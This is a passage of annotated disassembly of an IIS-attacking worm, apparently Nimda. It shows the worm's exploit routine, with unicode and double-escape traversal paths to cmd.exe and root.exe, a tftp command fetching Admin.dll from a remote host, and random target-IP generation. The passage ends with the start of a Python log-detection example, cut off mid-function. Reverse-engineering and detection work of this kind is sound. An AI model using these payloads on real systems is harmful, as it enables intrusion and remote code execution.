36172CE6 mov [ebp+arg_8], eax 36172CE9 lea eax, [ebp+arg_8] 36172CEC push eax 36172CED lea eax, [ebp+var_4] 36172CF0 push dword ptr [esi] 36172CF2 push eax 36172CF3 push 0 36172CF5 push [ebp+arg_4] 36172CF8 push [ebp+arg_0] 36172CFB call ds:RegQueryValueExA 36172D01 cmp eax, ebx 36172D03 mov [ebp+arg_C], eax 36172D06 jnz short loc_36172D22 36172D08 push dword ptr [esi] 36172D0A call ds:LocalFree 36172D10 add dword ptr [edi], 400h 36172D16 push dword ptr [edi] 36172D18 push 0 36172D1A call ds:LocalAlloc 36172D20 mov [esi], eax 36172D22 36172D22 loc_36172D22: ; CODE XREF: sub_36172CC1+45j 36172D22 cmp dword ptr [esi], 0 36172D25 jz short loc_36172D30 36172D27 mov eax, [ebp+arg_C] 36172D2A cmp eax, ebx 36172D2C jnz short loc_36172D3B 36172D2E jmp short loc_36172CE4 36172D30 ; ─────────────────────────────────────────────────────────────────────────── 36172D30 36172D30 loc_36172D30: ; CODE XREF: sub_36172CC1+64j 36172D30 push dword ptr [esi] 36172D32 call ds:LocalFree 36172D38 push 8 36172D3A pop eax 36172D3B 36172D3B loc_36172D3B: ; CODE XREF: sub_36172CC1+6Bj 36172D3B pop edi 36172D3C pop esi 36172D3D pop ebx 36172D3E leave 36172D3F retn 36172D3F sub_36172CC1 endp 36172D3F 36172D40 36172D40 ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 36172D40 36172D40 36172D40 sub_36172D40 proc near ; CODE XREF: sub_36172A2B+9p 36172D40 36172D40 arg_0 = dword ptr 4 36172D40 36172D40 mov ecx, [esp+arg_0] 36172D44 test ecx, ecx 36172D46 jz short loc_36172D4E 36172D48 mov eax, [ecx+18h] 36172D4B add eax, ecx 36172D4D retn 36172D4E ; ─────────────────────────────────────────────────────────────────────────── 36172D4E 36172D4E loc_36172D4E: ; CODE XREF: sub_36172D40+6j 36172D4E xor eax, eax 36172D50 retn 36172D50 sub_36172D40 endp 36172D50 36172D51 36172D51 ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 36172D51 36172D51 36172D51 sub_36172D51 proc near ; CODE XREF: sub_36172A2B+22p 36172D51 ; sub_36172A5E+22p 36172D51 
36172D51 arg_0           = dword ptr  4
36172D51
36172D51                 mov     ecx, [esp+arg_0]
36172D55                 test    ecx, ecx
36172D57                 jz      short loc_36172D5E
36172D59                 mov     eax, [ecx]
36172D5B                 add     eax, ecx
36172D5D                 retn
36172D5E ; ───────────────────────────────────────────────────────────────────────────
36172D5E
36172D5E loc_36172D5E:                           ; CODE XREF: sub_36172D51+6j
36172D5E                 xor     eax, eax
36172D60                 retn
36172D60 sub_36172D51    endp
36172D60
36172D61
36172D61 ; ███████████████ S U B R O U T I N E ███████████████████████████████████████
36172D61
36172D61
36172D61 sub_36172D61    proc near               ; CODE XREF: sub_36172A5E+9p
36172D61
36172D61 arg_0           = dword ptr  4
36172D61
36172D61                 mov     ecx, [esp+arg_0]
36172D65                 test    ecx, ecx
36172D67                 jz      short loc_36172D6F
36172D69                 mov     eax, [ecx+8]
36172D6C                 add     eax, ecx
36172D6E                 retn
36172D6F ; ───────────────────────────────────────────────────────────────────────────
36172D6F
36172D6F loc_36172D6F:                           ; CODE XREF: sub_36172D61+6j
36172D6F                 xor     eax, eax
36172D71                 retn
36172D71 sub_36172D61    endp
36172D71
36172D72
36172D72 ; ███████████████ S U B R O U T I N E ███████████████████████████████████████
36172D72
36172D72 ; Attributes: bp-based frame
36172D72
36172D72 sub_36172D72    proc near               ; CODE XREF: sub_36171F05+C0p
36172D72
36172D72 arg_0           = dword ptr  8
36172D72
36172D72                 push    ebp
36172D73                 mov     ebp, esp
36172D75                 push    esi
36172D76                 push    edi
36172D77                 mov     edi, [ebp+arg_0]
36172D7A                 xor     esi, esi
36172D7C                 cmp     edi, esi
36172D7E                 jle     short loc_36172D99
36172D80
36172D80 loc_36172D80:                           ; CODE XREF: sub_36172D72+25j
36172D80                 lea     eax, [ebp+arg_0]
36172D83                 mov     [ebp+arg_0], esi
36172D86                 push    eax
36172D87                 push    esi
36172D88                 push    esi
36172D89                 push    offset loc_36172DA0
36172D8E                 push    esi
36172D8F                 push    esi
36172D90                 call    ds:CreateThread
36172D96                 dec     edi
36172D97                 jnz     short loc_36172D80
36172D99
36172D99 loc_36172D99:                           ; CODE XREF: sub_36172D72+Cj
36172D99                 push    1
36172D9B                 pop     eax
36172D9C                 pop     edi
36172D9D                 pop     esi
36172D9E                 pop     ebp
36172D9F                 retn
36172DA0 ; ───────────────────────────────────────────────────────────────────────────
36172DA0
36172DA0 loc_36172DA0:                           ; CODE XREF: sub_36172D72+3Aj
36172DA0                                         ; DATA XREF: sub_36172D72+17o
36172DA0                 call    sub_36172DAE
36172DA5                 push    eax
36172DA6                 call    sub_36172E97    ; The exploit guts.
36172DA6                                         ;
36172DA6                                         ; Uses unicode directory traversal (Bugtraq ID 1806) and IIS/PWS escaped chars
36172DA6                                         ; bug (Bugtraq ID 2708).
36172DA6                                         ;
36172DA6                                         ; In addition, it searches for hosts that have been hit by Code Red, as an additional vector.
36172DAB                 pop     ecx
36172DAC                 jmp     short loc_36172DA0
36172DAC sub_36172D72    endp
36172DAC
36172DAE
36172DAE ; ███████████████ S U B R O U T I N E ███████████████████████████████████████
36172DAE
36172DAE
36172DAE sub_36172DAE    proc near               ; CODE XREF: sub_36172D72+2Ep
36172DAE                                         ; sub_36176E91+Ap
36172DAE                 push    ecx
36172DAF                 push    0FFFFFFFFh
36172DB1                 push    dword_3617D65C
36172DB7                 call    ds:WaitForSingleObject
36172DBD                 inc     dword_3617D660
36172DC3                 cmp     dword_3617D660, 4FFFFFFFh
36172DCD                 jbe     short loc_36172DD6
36172DCF                 and     dword_3617D660, 0
36172DD6
36172DD6 loc_36172DD6:                           ; CODE XREF: sub_36172DAE+1Fj
36172DD6                 push    ebx
36172DD7                 push    ebp
36172DD8                 push    esi
36172DD9                 push    edi
36172DDA                 call    ds:GetTickCount
36172DE0                 add     eax, dword_3617D660
36172DE6                 push    eax
36172DE7                 call    ds:srand
36172DED                 mov     esi, ds:rand
36172DF3                 pop     ecx
36172DF4                 call    esi ; rand
36172DF6                 shl     eax, 3
36172DF9                 mov     ebx, 7FFFh
36172DFE                 cdq
36172DFF                 mov     ecx, ebx
36172E01                 idiv    ecx
36172E03                 cmp     dword_3617D658, 0
36172E0A                 mov     ebp, eax
36172E0C                 jnz     short loc_36172E12
36172E0E                 test    ebp, ebp
36172E10                 jnz     short loc_36172E23
36172E12
36172E12 loc_36172E12:                           ; CODE XREF: sub_36172DAE+5Ej
36172E12                 call    esi ; rand
36172E14                 imul    eax, 0FFh
36172E1A                 cdq
36172E1B                 mov     ecx, ebx
36172E1D                 idiv    ecx
36172E1F                 mov     edi, eax
36172E21                 jmp     short loc_36172E27
36172E23 ; ───────────────────────────────────────────────────────────────────────────
36172E23
36172E23 loc_36172E23:                           ; CODE XREF: sub_36172DAE+62j
36172E23                 mov     edi, [esp+10h]
36172E27
36172E27 loc_36172E27:                           ; CODE XREF: sub_36172DAE+73j
36172E27                 cmp     ebp, 3
36172E2A                 jg      short loc_36172E3C
36172E2C                 test    ebp, ebp
36172E2E                 jz      short loc_36172E3C
36172E30                 mov     edi, dword_3617D654
36172E36                 and     edi, 0FFh
36172E3C
36172E3C loc_36172E3C:                           ; CODE XREF: sub_36172DAE+7Cj
36172E3C                                         ; sub_36172DAE+80j
36172E3C                 call    esi ; rand
36172E3E                 imul    eax, 0FFh
36172E44                 cdq
36172E45                 mov     ecx, ebx
36172E47                 idiv    ecx
36172E49                 shl     eax, 8
36172E4C                 or      edi, eax
36172E4E                 cmp     ebp, 3
36172E51                 jle     short loc_36172E5F
36172E53                 mov     edi, dword_3617D654
36172E59                 and     edi, 0FFFFh
36172E5F
36172E5F loc_36172E5F:                           ; CODE XREF: sub_36172DAE+A3j
36172E5F                 call    esi ; rand
36172E61                 imul    eax, 0FFh
36172E67                 cdq
36172E68                 mov     ecx, ebx
36172E6A                 idiv    ecx
36172E6C                 shl     eax, 10h
36172E6F                 or      edi, eax
36172E71                 call    esi ; rand
36172E73                 imul    eax, 0FFh
36172E79                 cdq
36172E7A                 idiv    ebx
36172E7C                 push    dword_3617D65C
36172E82                 mov     esi, eax
36172E84                 shl     esi, 18h
36172E87                 call    ds:ReleaseMutex
36172E8D                 mov     eax, esi
36172E8F                 or      eax, edi
36172E91                 pop     edi
36172E92                 pop     esi
36172E93                 pop     ebp
36172E94                 pop     ebx
36172E95                 pop     ecx
36172E96                 retn
36172E96 sub_36172DAE    endp
36172E96
36172E97
36172E97 ; ███████████████ S U B R O U T I N E ███████████████████████████████████████
36172E97
36172E97 ; The exploit guts.
36172E97 ;
36172E97 ; Uses unicode directory traversal (Bugtraq ID 1806) and IIS/PWS escaped chars
36172E97 ; bug (Bugtraq ID 2708).
36172E97 ;
36172E97 ; In addition, it searches for hosts that have been hit by Code Red, as an additional vector.
36172E97 ; Attributes: bp-based frame
36172E97
36172E97 sub_36172E97    proc near               ; CODE XREF: sub_36172D72+34p
36172E97
36172E97 var_2FC         = byte ptr -2FCh
36172E97 var_27C         = byte ptr -27Ch
36172E97 var_17C         = byte ptr -17Ch
36172E97 var_FC          = byte ptr -0FCh
36172E97 var_C8          = byte ptr -0C8h
36172E97 var_48          = dword ptr -48h
36172E97 var_44          = dword ptr -44h
36172E97 var_40          = dword ptr -40h
36172E97 var_3C          = dword ptr -3Ch
36172E97 var_38          = dword ptr -38h
36172E97 var_34          = dword ptr -34h
36172E97 var_30          = dword ptr -30h
36172E97 var_2C          = dword ptr -2Ch
36172E97 var_28          = dword ptr -28h
36172E97 var_24          = dword ptr -24h
36172E97 var_20          = dword ptr -20h
36172E97 var_1C          = dword ptr -1Ch
36172E97 var_18          = dword ptr -18h
36172E97 var_14          = dword ptr -14h
36172E97 var_10          = dword ptr -10h
36172E97 var_C           = dword ptr -0Ch
36172E97 var_8           = dword ptr -8
36172E97 var_4           = dword ptr -4
36172E97 arg_0           = dword ptr  8
36172E97
36172E97                 push    ebp
36172E98                 mov     ebp, esp
36172E9A                 sub     esp, 2FCh
36172EA0                 push    ebx
36172EA1                 push    esi
36172EA2                 push    edi
36172EA3                 push    0Ch
36172EA5                 pop     ecx
36172EA6                 mov     esi, offset HTTP_GET ; "GET %s HTTP/1.0\r\nHost: www\r\nConnnection"...
36172EAB                 lea     edi, [ebp-0FCh]
36172EB1                 and     dword ptr [ebp-4], 0
36172EB5                 repe movsd
36172EB7                 movsw
36172EB9                 movsb
36172EBA                 mov     esi, ds:sprintf
36172EC0                 lea     eax, [ebp-48h]
36172EC3                 mov     dword ptr [ebp-48h], offset scripts_dir ; "/scripts"
36172ECA                 mov     dword ptr [ebp-44h], offset MSADC_dir ; "/MSADC"
36172ED1                 mov     dword ptr [ebp-40h], offset aC_0 ; "/c"
36172ED8                 mov     dword ptr [ebp-3Ch], offset aD ; "/d"
36172EDF                 mov     dword ptr [ebp-38h], offset esc_char1 ; "/scripts/..%255c.."
36172EE6                 mov     dword ptr [ebp-34h], offset esc_char2 ; "/_vti_bin/..%255c../..%255c../..%255c.."
36172EED                 mov     dword ptr [ebp-30h], offset esc_char3 ; "/_mem_bin/..%255c../..%255c../..%255c.."
36172EF4                 mov     dword ptr [ebp-2Ch], offset esc_char4 ; "/msadc/..%255c../..%255c../..%255c/..%c"...
36172EFB                 mov     dword ptr [ebp-28h], offset unicode_1 ; "/scripts/..%c1%1c.."
36172F02                 mov     dword ptr [ebp-24h], offset unicode_2 ; "/scripts/..%c0%2f.."
36172F09                 mov     dword ptr [ebp-20h], offset unicode_3 ; "/scripts/..%c0%af.."
36172F10                 mov     dword ptr [ebp-1Ch], offset unicode_4 ; "/scripts/..%c1%9c.."
36172F17                 mov     dword ptr [ebp-18h], offset aScripts__3563_ ; "/scripts/..%%35%63.."
36172F1E                 mov     dword ptr [ebp-14h], offset aScripts__35c__ ; "/scripts/..%%35c.."
36172F25                 mov     dword ptr [ebp-10h], offset aScripts__25356 ; "/scripts/..%25%35%63.."
36172F2C                 mov     dword ptr [ebp-0Ch], offset aScripts__252f_ ; "/scripts/..%252f.."
36172F33                 mov     [ebp-8], eax
36172F36
36172F36 loc_36172F36:                           ; CODE XREF: sub_36172E97+2CEj
36172F36                 mov     eax, [ebp+var_8]
36172F39                 mov     ebx, [eax]
36172F3B                 lea     eax, [ebp+var_C8]
36172F41                 push    ebx
36172F42                 push    eax
36172F43                 call    _strcpy
36172F48                 cmp     dword ptr [ebp-4], 2
36172F4C                 pop     ecx
36172F4D                 pop     ecx
36172F4E                 jge     short loc_36172F57
36172F50                 push    offset root_exe ; this is trying to scavenge Code Red attempts
36172F55                 jmp     short loc_36172F5C
36172F57 ; ───────────────────────────────────────────────────────────────────────────
36172F57
36172F57 loc_36172F57:                           ; CODE XREF: sub_36172E97+B7j
36172F57                 push    offset winnt_cmd ; else, the worm just tries executing a "dir c:" on the remote host
36172F5C
36172F5C loc_36172F5C:                           ; CODE XREF: sub_36172E97+BEj
36172F5C                 lea     eax, [ebp-0C8h]
36172F62                 push    eax
36172F63                 call    _strcat
36172F68                 pop     ecx
36172F69                 lea     eax, [ebp-0C8h]
36172F6F                 pop     ecx
36172F70                 push    offset dir      ; "dir"
36172F75                 push    eax
36172F76                 call    _strcat
36172F7B                 lea     eax, [ebp-0C8h]
36172F81                 push    eax
36172F82                 lea     eax, [ebp-0FCh]
36172F88                 push    eax
36172F89                 lea     eax, [ebp-27Ch]
36172F8F                 push    eax
36172F90                 call    esi ; sprintf
36172F92                 lea     eax, [ebp-17Ch]
36172F98                 push    eax
36172F99                 lea     eax, [ebp-27Ch]
36172F9F                 push    eax
36172FA0                 push    dword ptr [ebp+8]
36172FA3                 call    sub_36173173
36172FA8                 add     esp, 20h
36172FAB                 cmp     eax, 63h
36172FAE                 jz      loc_3617316B
36172FB4                 test    eax, eax
36172FB6                 jz      loc_3617315A
36172FBC                 lea     eax, [ebp-17Ch]
36172FC2                 push    eax
36172FC3                 call    sub_361732F5
36172FC8                 test    eax, eax
36172FCA                 pop     ecx
36172FCB                 jz      loc_3617315A
36172FD1                 xor     edi, edi
36172FD3
36172FD3 loc_36172FD3:                           ; CODE XREF: sub_36172E97+255j
36172FD3                 lea     eax, [ebp-0C8h]
36172FD9                 push    ebx
36172FDA                 push    eax
36172FDB                 call    _strcpy
36172FE0                 cmp     dword ptr [ebp-4], 2
36172FE4                 pop     ecx
36172FE5                 pop     ecx
36172FE6                 jge     short loc_36172FEF
36172FE8                 push    offset root_exe ; "/root.exe?/c+"
36172FED                 jmp     short loc_36172FF4
36172FEF ; ───────────────────────────────────────────────────────────────────────────
36172FEF
36172FEF loc_36172FEF:                           ; CODE XREF: sub_36172E97+14Fj
36172FEF                 push    offset winnt_cmd ; "/winnt/system32/cmd.exe?/c+"
36172FF4
36172FF4 loc_36172FF4:                           ; CODE XREF: sub_36172E97+156j
36172FF4                 lea     eax, [ebp-0C8h]
36172FFA                 push    eax
36172FFB                 call    _strcat
36173000                 pop     ecx
36173001                 lea     eax, [ebp-0C8h]
36173007                 pop     ecx
36173008                 push    offset TFTP_GET ; "tftp%%20-i%%20%s%%20GET%%20Admin.dll%%2"...
3617300D                 push    eax
3617300E                 call    _strcpy
36173013                 cmp     dword ptr [ebp-4], 2
36173017                 pop     ecx
36173018                 pop     ecx
36173019                 jge     short loc_36173022
3617301B                 push    offset Admin_dll ; "Admin.dll"
36173020                 jmp     short loc_36173043
36173022 ; ───────────────────────────────────────────────────────────────────────────
36173022
36173022 loc_36173022:                           ; CODE XREF: sub_36172E97+182j
36173022                 test    edi, edi
36173024                 jnz     short loc_3617302D
36173026                 push    offset C_Admin_dll ; "c:\\Admin.dll"
3617302B                 jmp     short loc_36173043
3617302D ; ───────────────────────────────────────────────────────────────────────────
3617302D
3617302D loc_3617302D:                           ; CODE XREF: sub_36172E97+18Dj
3617302D                 cmp     edi, 1
36173030                 jnz     short loc_36173039
36173032                 push    offset D_Admin_dll ; "d:\\Admin.dll"
36173037                 jmp     short loc_36173043
36173039 ; ───────────────────────────────────────────────────────────────────────────
36173039
36173039 loc_36173039:                           ; CODE XREF: sub_36172E97+199j
36173039                 cmp     edi, 2
3617303C                 jnz     short loc_36173051
3617303E                 push    offset E_Admin_dll ; "e:\\Admin.dll"
36173043
36173043
loc_36173043: ; CODE XREF: sub_36172E97+189j 36173043 ; sub_36172E97+194j ... 36173043 lea eax, [ebp-0C8h] 36173049 push eax 3617304A call _strcat 3617304F pop ecx 36173050 pop ecx 36173051 36173051 loc_36173051: ; CODE XREF: sub_36172E97+1A5j 36173051 lea eax, [ebp-0C8h] 36173057 push offset byte_3617D640 3617305C push eax 3617305D lea eax, [ebp+var_2FC] 36173063 push eax 36173064 call esi ; sprintf 36173066 lea eax, [ebp-0C8h] 3617306C push ebx 3617306D push eax 3617306E call _strcpy 36173073 add esp, 14h 36173076 cmp dword ptr [ebp-4], 2 3617307A jge short loc_36173083 3617307C push offset root_exe ; "/root.exe?/c+" 36173081 jmp short loc_36173088 36173083 ; ─────────────────────────────────────────────────────────────────────────── 36173083 36173083 loc_36173083: ; CODE XREF: sub_36172E97+1E3j 36173083 push offset winnt_cmd ; "/winnt/system32/cmd.exe?/c+" 36173088 36173088 loc_36173088: ; CODE XREF: sub_36172E97+1EAj 36173088 lea eax, [ebp+var_C8] 3617308E push eax 3617308F call _strcat 36173094 pop ecx 36173095 lea eax, [ebp+var_2FC] 3617309B pop ecx 3617309C push eax 3617309D lea eax, [ebp+var_C8] 361730A3 push eax 361730A4 call _strcat 361730A9 lea eax, [ebp+var_C8] 361730AF push eax 361730B0 lea eax, [ebp+var_FC] 361730B6 push eax 361730B7 lea eax, [ebp+var_27C] 361730BD push eax 361730BE call esi ; sprintf 361730C0 lea eax, [ebp+var_17C] 361730C6 push eax 361730C7 lea eax, [ebp+var_27C] 361730CD push eax 361730CE push [ebp+arg_0] 361730D1 call sub_36173173 361730D6 add esp, 20h 361730D9 cmp eax, 63h 361730DC jz loc_3617316B 361730E2 inc edi 361730E3 cmp [ebp+var_4], 1 361730E7 jle short loc_361730F2 361730E9 cmp edi, 3 361730EC jl loc_36172FD3 361730F2 361730F2 loc_361730F2: ; CODE XREF: sub_36172E97+250j 361730F2 test eax, eax 361730F4 jz short loc_3617315A 361730F6 lea eax, [ebp+var_17C] 361730FC push eax 361730FD call sub_361732F5 36173102 test eax, eax 36173104 pop ecx 36173105 jz short loc_3617315A 36173107 lea eax, [ebp+var_C8] 3617310D push ebx 
3617310E push eax 3617310F call _strcpy 36173114 lea eax, [ebp+var_C8] 3617311A push offset aAdmin_dll_0 ; "/Admin.dll" 3617311F push eax 36173120 call _strcat 36173125 lea eax, [ebp+var_C8] 3617312B push eax 3617312C lea eax, [ebp+var_FC] 36173132 push eax 36173133 lea eax, [ebp+var_27C] 36173139 push eax 3617313A call esi ; sprintf 3617313C lea eax, [ebp+var_17C] 36173142 push eax 36173143 lea eax, [ebp+var_27C] 36173149 push eax 3617314A push [ebp+arg_0] 3617314D call sub_36173173 36173152 add esp, 28h 36173155 cmp eax, 63h 36173158 jz short loc_3617316B 3617315A 3617315A loc_3617315A: ; CODE XREF: sub_36172E97+11Fj 3617315A ; sub_36172E97+134j ... 3617315A inc [ebp+var_4] 3617315D add [ebp+var_8], 4 36173161 cmp [ebp+var_4], 10h 36173165 jl loc_36172F36 3617316B 3617316B loc_3617316B: ; CODE XREF: sub_36172E97+117j 3617316B ; sub_36172E97+245j ... 3617316B push 1 3617316D pop eax 3617316E pop edi 3617316F pop esi 36173170 pop ebx 36173171 leave 36173172 retn 36173172 sub_36172E97 endp 36173172 36173173 36173173 ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 36173173 36173173 ; Attributes: bp-based frame 36173173 36173173 sub_36173173 proc near ; CODE XREF: sub_36172E97+10Cp 36173173 ; sub_36172E97+23Ap ... 
36173173 36173173 var_120 = dword ptr -120h 36173173 var_11C = dword ptr -11Ch 36173173 var_1C = word ptr -1Ch 36173173 var_1A = word ptr -1Ah 36173173 var_18 = dword ptr -18h 36173173 var_C = dword ptr -0Ch 36173173 var_4 = dword ptr -4 36173173 arg_0 = dword ptr 8 36173173 arg_4 = dword ptr 0Ch 36173173 arg_8 = dword ptr 10h 36173173 36173173 push ebp 36173174 mov ebp, esp 36173176 sub esp, 120h 3617317C push ebx 3617317D push esi 3617317E push edi 3617317F xor esi, esi 36173181 push 10h 36173183 lea eax, [ebp+var_1C] 36173186 push esi 36173187 push eax 36173188 call _memset 3617318D mov eax, [ebp+arg_0] 36173190 add esp, 0Ch 36173193 mov [ebp+var_1C], 2 36173199 mov [ebp+var_18], eax 3617319C push 50h 3617319E call dword_3617AC38 361731A4 push esi 361731A5 push 1 361731A7 pop ebx 361731A8 mov [ebp+var_1A], ax 361731AC push ebx 361731AD push 2 361731AF call dword_3617AC5C 361731B5 mov edi, eax 361731B7 cmp edi, 0FFFFFFFFh 361731BA jnz short loc_361731C3 361731BC xor eax, eax 361731BE jmp loc_361732F0 361731C3 ; ─────────────────────────────────────────────────────────────────────────── 361731C3 361731C3 loc_361731C3: ; CODE XREF: sub_36173173+47j 361731C3 lea eax, [ebp+var_4] 361731C6 mov [ebp+var_4], ebx 361731C9 push eax 361731CA push 8004667Eh 361731CF push edi 361731D0 call dword_3617AC18 361731D6 test eax, eax 361731D8 jnz loc_361732E7 361731DE lea eax, [ebp+var_1C] 361731E1 push 10h 361731E3 push eax 361731E4 push edi 361731E5 call dword_3617AC58 361731EB push 8 361731ED lea eax, [ebp+var_C] 361731F0 push esi 361731F1 push eax 361731F2 call _memset 361731F7 add esp, 0Ch 361731FA lea eax, [ebp+var_C] 361731FD mov [ebp+var_C], 5 36173204 mov [ebp+var_11C], edi 3617320A push eax 3617320B lea eax, [ebp+var_120] 36173211 push esi 36173212 push eax 36173213 push esi 36173214 push esi 36173215 mov [ebp+var_120], ebx 3617321B call dword_3617AC40 36173221 cmp eax, esi 36173223 jz loc_361732E4 36173229 cmp eax, 0FFFFFFFFh 3617322C jz loc_361732E4 36173232 lea eax, 
[ebp+var_120] 36173238 push eax 36173239 push edi 3617323A call dword_3617AC60 36173240 test eax, eax 36173242 jz loc_361732E4 36173248 lea eax, [ebp+var_4] 3617324B mov [ebp+var_4], esi 3617324E push eax 3617324F push 8004667Eh 36173254 push edi 36173255 call dword_3617AC18 3617325B test eax, eax 3617325D jnz loc_361732E7 36173263 push esi 36173264 push [ebp+arg_4] 36173267 call _strlen 3617326C pop ecx 3617326D push eax 3617326E push [ebp+arg_4] 36173271 push edi 36173272 call dword_3617AC48 36173278 cmp eax, 0FFFFFFFFh 3617327B jz short loc_361732E7 3617327D push 8 3617327F lea eax, [ebp+var_C] 36173282 push esi 36173283 push eax 36173284 call _memset 36173289 add esp, 0Ch 3617328C lea eax, [ebp+var_C] 3617328F mov [ebp+var_C], 5Ah 36173296 mov [ebp+var_11C], edi 3617329C push eax 3617329D push esi 3617329E lea eax, [ebp+var_120] 361732A4 push esi 361732A5 push eax 361732A6 push esi 361732A7 mov [ebp+var_120], ebx 361732AD call dword_3617AC40 361732B3 cmp eax, esi 361732B5 jz short loc_361732E7 361732B7 cmp eax, 0FFFFFFFFh 361732BA jz short loc_361732E7 361732BC lea eax, [ebp+var_120] 361732C2 push eax 361732C3 push edi 361732C4 call dword_3617AC60 361732CA test eax, eax 361732CC jz short loc_361732E7 361732CE push esi 361732CF push 7Fh 361732D1 push [ebp+arg_8] 361732D4 push edi 361732D5 call dword_3617AC50 361732DB cmp eax, 0FFFFFFFFh 361732DE jz short loc_361732E7 361732E0 mov esi, ebx 361732E2 jmp short loc_361732E7 361732E4 ; ─────────────────────────────────────────────────────────────────────────── 361732E4 361732E4 loc_361732E4: ; CODE XREF: sub_36173173+B0j 361732E4 ; sub_36173173+B9j ... 361732E4 push 63h 361732E6 pop esi 361732E7 361732E7 loc_361732E7: ; CODE XREF: sub_36173173+65j 361732E7 ; sub_36173173+EAj ... 
361732E7                 push    edi
361732E8                 call    dword_3617AC3C
361732EE                 mov     eax, esi
361732F0
361732F0 loc_361732F0:                           ; CODE XREF: sub_36173173+4Bj
361732F0                 pop     edi
361732F1                 pop     esi
361732F2                 pop     ebx
361732F3                 leave
361732F4                 retn
361732F4 sub_36173173    endp
361732F4
361732F5
361732F5 ; ███████████████ S U B R O U T I N E ███████████████████████████████████████
361732F5
361732F5
361732F5 sub_361732F5    proc near               ; CODE XREF: sub_36172E97+12Cp
361732F5                                         ; sub_36172E97+266p
361732F5
361732F5 arg_0           = dword ptr  4
361732F5
361732F5                 mov     eax, [esp+arg_0]
361732F9                 mov     cl, [eax+9]
361732FC                 cmp     cl, 32h
361732FF                 jnz     short loc_3617330D
36173301                 cmp     byte ptr [eax+0Ah], 30h
36173305                 jnz     short loc_3617330D
36173307                 cmp     byte ptr [eax+0Bh], 30h
3617330B                 jz      short loc_3617331E
3617330D
3617330D loc_3617330D:                           ; CODE XREF: sub_361732F5+Aj
3617330D                                         ; sub_361732F5+10j
3617330D                 cmp     cl, 35h
36173310                 jnz     short loc_36173322
36173312                 cmp     byte ptr [eax+0Ah], 30h
36173316                 jnz     short loc_36173322
36173318                 cmp     byte ptr [eax+0Bh], 32h
3617331C                 jnz     short loc_36173322
3617331E
3617331E loc_3617331E:                           ; CODE XREF: sub_361732F5+16j
3617331E                 push    1
36173320                 pop     eax
36173321                 retn
36173322 ; ───────────────────────────────────────────────────────────────────────────
36173322
36173322 loc_36173322:                           ; CODE XREF: sub_361732F5+1Bj
36173322                                         ; sub_361732F5+21j ...
36173322 xor eax, eax 36173324 retn 36173324 sub_361732F5 endp 36173324 36173325 36173325 ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 36173325 36173325 ; Attributes: bp-based frame 36173325 36173325 sub_36173325 proc near ; CODE XREF: sub_36171F05+E0p 36173325 ; sub_36171F05+131p 36173325 36173325 var_14 = byte ptr -14h 36173325 var_8 = dword ptr -8 36173325 var_4 = byte ptr -4 36173325 36173325 push ebp 36173326 mov ebp, esp 36173328 sub esp, 14h 3617332B push ebx 3617332C push esi 3617332D push edi 3617332E call ds:GetLogicalDrives ; Get bitmask representing 3617332E ; the currently available disk drives 36173334 mov [ebp+var_8], eax 36173337 xor ebx, ebx 36173339 36173339 loc_36173339: ; CODE XREF: sub_36173325+70j 36173339 push 1 3617333B lea ecx, [ebx+2] 3617333E pop eax 3617333F shl eax, cl 36173341 mov ecx, [ebp+var_8] 36173344 test ecx, eax 36173346 jz short loc_36173391 36173348 mov esi, offset aC_1 ; "c:" 3617334D lea edi, [ebp+var_4] 36173350 movsw 36173352 mov al, bl 36173354 add al, 63h 36173356 movsb 36173357 mov [ebp+var_4], al 3617335A lea eax, [ebp+var_4] 3617335D push eax 3617335E lea eax, [ebp+var_14] 36173361 push eax 36173362 call _strcpy 36173367 lea eax, [ebp+var_14] 3617336A push offset asc_36179474 ; "\\" 3617336F push eax 36173370 call _strcat 36173375 add esp, 10h 36173378 lea eax, [ebp+var_14] 3617337B push eax 3617337C call ds:GetDriveTypeA 36173382 cmp eax, 3 36173385 jnz short loc_36173391 36173387 lea eax, [ebp+var_4] 3617338A push eax 3617338B call sub_3617339F 36173390 pop ecx 36173391 36173391 loc_36173391: ; CODE XREF: sub_36173325+21j 36173391 ; sub_36173325+60j 36173391 inc ebx 36173392 cmp ebx, 18h 36173395 jl short loc_36173339 36173397 push 1 36173399 pop eax 3617339A pop edi 3617339B pop esi 3617339C pop ebx 3617339D leave 3617339E retn 3617339E sub_36173325 endp 3617339E 3617339F 3617339F ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 3617339F 3617339F 
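The request strings that sub_36172E97 assembles above (the %255c escaped-chars and %c0%af / %c1%9c overlong-UTF-8 traversals, the /root.exe and /winnt/system32/cmd.exe targets) and the "200"/"502" reply test in sub_361732F5 are what a web server administrator can look for in access logs. The following is an added detection example, not code from this article or from the worm; the log format, the sample lines and the function names are assumptions.

```python
import re

# Constructed access-log lines in Apache common log format (not from the article).
# The request paths are the probe strings sub_36172E97 builds, plus one clean hit.
SAMPLE_LOG = """\
10.0.0.5 - - [18/Sep/2001:12:00:01 +0000] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
10.0.0.5 - - [18/Sep/2001:12:00:02 +0000] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 -
10.0.0.5 - - [18/Sep/2001:12:00:03 +0000] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
10.0.0.5 - - [18/Sep/2001:12:00:04 +0000] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%2010.0.0.5%20GET%20Admin.dll%20c:\\Admin.dll HTTP/1.0" 502 -
192.0.2.10 - - [18/Sep/2001:12:00:05 +0000] "GET /index.html HTTP/1.0" 200 1234
10.0.0.5 - - [18/Sep/2001:12:00:06 +0000] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
10.0.0.5 - - [18/Sep/2001:12:00:07 +0000] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 0
"""

HEX_DIGITS = b"0123456789abcdefABCDEF"
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
PAYLOAD_NAMES = ("cmd.exe", "root.exe")   # what the probes ultimately ask the server to run


def percent_decode_once(data: bytes) -> bytes:
    """One pass of %xx decoding. A '%' not followed by two hex digits is kept as a
    literal, which is why '%%35%63' becomes '%5c' here and '\\' on the next pass."""
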